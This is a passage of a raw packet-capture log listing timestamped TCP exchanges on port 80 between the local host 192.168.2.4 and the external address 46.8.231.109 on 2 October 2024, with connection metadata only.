Oct 2, 2024 09:41:28.068232059 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068232059 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068248034 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068275928 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068306923 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068316936 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068316936 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068339109 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068356037 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068370104 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068401098 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068432093 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068463087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068494081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068525076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068557024 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068588018 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068619013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068619013 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068619013 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068619013 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068619013 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068619967 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068650961 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068681955 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068713903 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068747997 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068780899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068810940 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068842888 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068873882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068903923 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.068926096 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068926096 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068926096 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068926096 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068926096 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.068926096 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.070333958 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147175074 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147208929 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147241116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147289991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147322893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147370100 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147419930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147419930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147419930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147419930 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147422075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147454977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147486925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147535086 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147567034 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147598028 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147629976 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147644997 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147644997 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147644997 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147644997 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147644997 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147660017 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147667885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147667885 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147691011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147722006 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147754908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147787094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147794962 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147794962 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147794962 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147794962 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147819042 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147849083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147881985 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147912025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147944927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.147984028 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147984028 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147984028 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147984028 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147984028 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.147984982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148176908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148205042 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148252964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148284912 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148313999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148344994 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148385048 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148385048 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148385048 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148385048 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148385048 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148386002 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148394108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148442030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148477077 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148508072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148559093 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148607016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148638964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148647070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148647070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148647070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148647070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148647070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148647070 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148667097 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148711920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148761034 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148802996 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148853064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148893118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148893118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148893118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148893118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148893118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148893118 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.148901939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148950100 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.148981094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.149013042 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.149032116 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.149032116 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.149043083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.149046898 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.149075031 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.149106026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.149137020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.149167061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.149175882 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.149175882 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.149175882 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.149175882 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.149175882 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.149198055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.149226904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.149259090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.149288893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.149319887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.149350882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.149358988 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.149358988 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.149358988 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.149359941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.149359941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.149359941 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.149383068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.149652004 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.149652004 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.154870987 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.154947996 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155002117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155033112 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155065060 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155096054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155128002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155175924 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155209064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155240059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155258894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155258894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155258894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155258894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155258894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155271053 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155319929 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155352116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155400038 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155420065 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155420065 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155421019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155421019 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155452013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155467987 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155483961 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155517101 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155546904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155596018 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155626059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155658007 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155664921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155664921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155664921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155664921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155664921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155664921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155709028 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155746937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155746937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155747890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155781984 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155812979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155817986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155817986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155859947 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155891895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155922890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.155963898 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155963898 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155963898 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155963898 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.155972958 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156004906 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156035900 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156066895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156099081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156131983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156163931 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156194925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156225920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156256914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156265974 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156265974 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156265974 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156265974 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156265974 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156265974 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156306028 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156337023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156368971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156399012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156430960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156461954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156471968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156471968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156471968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156471968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156471968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156471968 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156495094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156526089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156557083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156586885 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156619072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156649113 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156657934 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156657934 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156657934 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156657934 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156657934 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156657934 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156681061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156714916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156745911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156776905 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156809092 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156840086 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156848907 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156848907 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156848907 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156848907 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156848907 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156848907 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.156872034 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156903028 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156934977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.156965971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.157000065 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.157031059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.157040119 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.157041073 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.157041073 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.157041073 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.157041073 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.157041073 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.157062054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.157090902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.157121897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.157154083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.157186031 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.157217979 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.157224894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.157224894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.157224894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.157224894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.157224894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.157224894 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.157248974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.157279968 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.157311916 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.157358885 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.157392025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.157423019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.157433033 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.157433033 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.157433033 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.157433033 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.157433033 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.157433033 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.157454967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.158252954 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.158252954 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.236071110 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236139059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236191034 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236224890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236258030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236263990 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.236264944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.236264944 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.236290932 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236341953 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236391068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236423016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236454964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236488104 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236516953 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236541986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.236541986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.236541986 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.236548901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236563921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.236563921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.236563921 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.236582041 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236609936 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236624956 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.236640930 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236674070 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236707926 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236738920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236769915 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236804008 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236813068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.236813068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.236813068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.236813068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.236813068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.236813068 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:28.236836910 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:28.236955881 CEST	80	49749	46.8.231.109	192.168.2.4
